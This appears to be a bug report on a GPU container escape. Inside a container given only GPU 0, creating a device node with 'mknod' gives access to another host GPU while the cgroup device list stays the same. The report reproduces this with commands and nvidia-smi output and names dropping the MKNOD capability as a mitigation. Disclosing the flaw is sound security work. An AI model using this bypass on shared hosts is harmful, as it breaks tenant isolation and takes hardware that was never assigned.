GPU container can get the permission of other GPUs on the host

1. Issue description

The GPU container can break the isolation to get the permission of other GPUs on the host

2. Steps to reproduce the issue

start a GPU container, and attach /dev/nvidia0

$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0  nvidia/cuda:10.1-runtime-ubuntu16.04 bash

the container can access the GPU as expected

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

the cgroup setup c 195:0 rw is also as expected

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

BUT
if I create other GPU device files with GPU0’s major/minor number, something unexpected will happen.

root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0

the /dev/nvidia1 with the nvidia0 's device number create successfully

root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236,   0 Oct  9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236,   1 Oct  9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195,   0 Oct  9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195,   0 Nov  4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct  9 01:32 /dev/nvidiactl

the GPU1 can be listed by nvidia-smi unexpectedly

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

and the cgroup setup doesn’t change at all

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

I have run a tensorflow demo in the container, these 2 GPUs can indeed be used.

This problem can be avoid be add arg --cap-drop MKNOD for docker run , but docker container has the MKNOD cap by default.

And it seems like this operation can trick cgroup to get the permission of other GPUs on host.

It’s a big risk.